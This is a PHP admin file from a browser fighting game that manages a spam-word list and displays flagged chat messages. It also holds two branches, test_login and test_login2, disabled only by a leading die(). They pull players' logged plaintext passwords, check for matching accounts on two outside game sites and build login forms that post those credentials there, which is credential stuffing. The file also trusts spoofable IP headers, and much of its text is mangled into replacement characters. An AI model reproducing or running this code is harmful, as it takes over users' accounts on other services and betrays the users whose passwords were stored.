game/spam.php

152 lines
6.6 KiB
PHP
Raw Normal View History

2022-06-06 21:30:34 +00:00
<?php
function GetRealIp()
{
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
return $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
return $_SERVER['HTTP_X_FORWARDED_FOR'];
}
return $_SERVER['REMOTE_ADDR'];
2022-06-06 21:30:34 +00:00
}
define('IP', GetRealIp());
2022-06-06 21:30:34 +00:00
include('_incl_data/__config.php');
const GAME = true;
2022-06-06 21:30:34 +00:00
include('_incl_data/class/__db_connect.php');
$u = User::start();
2022-06-06 21:30:34 +00:00
if (isset($_GET['test_login'])) {
die();
$xx = mysql_fetch_array(
mysql_query(
'SELECT COUNT(*) FROM `users` WHERE `real` > 0 AND `id` > "' . mysql_real_escape_string(
$_GET['test_login']
) . '" LIMIT 1'
)
);
$sp = mysql_query(
'SELECT `id`,`login`,`pass` FROM `users` WHERE `real` > 0 AND `id` IN ( SELECT `uid` FROM `logs_auth` WHERE `depass` != "" GROUP BY `uid` ) AND `id` > "' . mysql_real_escape_string(
$_GET['test_login']
) . '" ORDER BY `id` ASC LIMIT 1'
);
while ($pl = mysql_fetch_array($sp)) {
$test = false;
$cn = file_get_contents('https://old-combats.com/info/' . $pl['login'] . '');
$cn = explode('<title>', $cn);
$cn = explode('</title>', $cn[1]);
$cn = $cn[0];
echo '[' . $cn . ']';
if ($cn != '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>') {
$test = true;
}
if ($test) {
$logs = mysql_fetch_array(
mysql_query('SELECT `depass` FROM `logs_auth` WHERE `uid` = "' . $pl['id'] . '" AND `depass` != ""')
);
echo '' . $pl['login'] . ' - ' . $pl['pass'] . ' - <a href="/spam.php?test_login=' . $pl['id'] . '">' . $pl['id'] . '</a> -> (' . $xx[0] . ') "';
print_r($logs);
echo '"<br><form method="post" action="https://old-combats.com/enter.php" target="_blank"><input type="text" name="login" value="' . $pl['login'] . '"><br><input type="text" name="pass" value="' . $logs['depass'] . '"><input type="submit" value="Enter!"></form>';
} else {
die('location: /spam.php?test_login=' . $pl['id'] . '<script>setTimeout(function(){top.location.href="/spam.php?test_login=' . $pl['id'] . '";},150);</script>');
}
}
die();
} elseif (isset($_GET['test_login2'])) {
die();
$xx = mysql_fetch_array(
mysql_query('SELECT COUNT(*) FROM `users` WHERE `real` > 0 AND `id` > ' . (int)$_GET['test_login2']));
$sp = mysql_query(
'SELECT `id`,`login`,`pass` FROM `users` WHERE `real` > 0 AND `id` IN ( SELECT `uid` FROM `logs_auth` WHERE `depass` != "" GROUP BY `uid` ) AND `id` > "' . mysql_real_escape_string(
$_GET['test_login2']
) . '" ORDER BY `id` LIMIT 1'
);
while ($pl = mysql_fetch_array($sp)) {
$test = false;
$cn = file_get_contents('https://mycombats.com/info/' . $pl['login'] . '');
$cn = explode('<TITLE>', $cn);
$cn = explode('</TITLE>', $cn[1]);
$cn = $cn[0];
echo '[' . $cn . ']';
if ($cn != '<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>') {
$test = true;
}
if ($test) {
$logs = mysql_fetch_array(
mysql_query('SELECT `depass` FROM `logs_auth` WHERE `uid` = "' . $pl['id'] . '" AND `depass` != ""')
);
echo '' . $pl['login'] . ' - ' . $pl['pass'] . ' - <a href="/spam.php?test_login2=' . $pl['id'] . '">' . $pl['id'] . '</a> -> (' . $xx[0] . ') "';
print_r($logs);
echo '"<br><form method="post" action="https://mycombats.com/enter.php" target="_blank"><input type="text" name="login" value="' . $pl['login'] . '"><br><input type="text" name="psw" value="' . $logs['depass'] . '"><input type="submit" value="Enter!"></form>';
} else {
die('location: /spam.php?test_login2=' . $pl['id'] . '<script>setTimeout(function(){top.location.href="/spam.php?test_login2=' . $pl['id'] . '";},150);</script>');
}
}
die();
2022-06-06 21:30:34 +00:00
}
if (isset($_GET['chat'])) {
$sp = mysql_query('SELECT * FROM `chat` WHERE `spam` > 0 ORDER BY `time` DESC');
while ($pl = mysql_fetch_array($sp)) {
echo date('d.m.Y H:i', $pl['time']) . ' <b>' . $pl['login'] . '</b>: ' . $pl['text'] . '<hr>';
}
die();
2022-06-06 21:30:34 +00:00
}
if ($u->info['admin']) {
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "https://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8"/>
<meta http-equiv=Cache-Control Content=no-cache>
<meta http-equiv=PRAGMA content=NO-CACHE>
<meta http-equiv=Expires Content=0>
<link href="https://img.new-combats.com/css/main.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="js/jquery.1.11.js"></script>
<body style="padding-top:0px; margin-top:7px; height:100%; background-color:#dedede;">
<b><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD>\<5C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:</b> &nbsp; <input onClick="location.href='/spam.php';" type="button"
value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"><br><br>
<?php
$spam = mysql_fetch_array(mysql_query('SELECT * FROM `spam_word` WHERE `id` = 1 LIMIT 1'));
$spam = $spam['data'];
$spam = explode('|', $spam);
//
if (isset($_GET['del'])) {
echo '<div><font color="red"><3E><><EFBFBD><EFBFBD><EFBFBD> &quot;<b>' . $spam[floor(
(int)$_GET['del']
)] . '</b>&quot; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.</font><br><br></div>';
unset($spam[floor((int)$_GET['del'])]);
$spam = implode('|', $spam);
mysql_query(
'UPDATE `spam_word` SET `data` = "' . mysql_real_escape_string($spam) . '" WHERE `id` = "1" LIMIT 1'
);
$spam = explode('|', $spam);
} elseif (isset($_POST['add'])) {
$_POST['add'] = htmlspecialchars($_POST['add'], null, 'cp1251');
echo '<div><font color="green"><3E><><EFBFBD><EFBFBD><EFBFBD> &quot;<b>' . $_POST['add'] . '</b>&quot; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.</font><br><br></div>';
$spam = implode('|', $spam);
$spam .= '|' . $_POST['add'] . '';
mysql_query(
'UPDATE `spam_word` SET `data` = "' . mysql_real_escape_string($spam) . '" WHERE `id` = "1" LIMIT 1'
);
$spam = explode('|', $spam);
}
//
$i = 0;
while ($i < count($spam)) {
echo '' . $spam[$i] . ' <a href="/spam.php?del=' . $i . '"><img src="https://img.new-combats.com/i/close2.gif"></a><hr>';
$i++;
}
?>
<form method="post" action="/spam.php">
<input type="text" name="add" value="" style="width:244px;"> <input type="submit" value="<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>">
</form>
</body>
</html>
<?php
} else {
die('<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>? :)');
2022-06-06 21:30:34 +00:00
}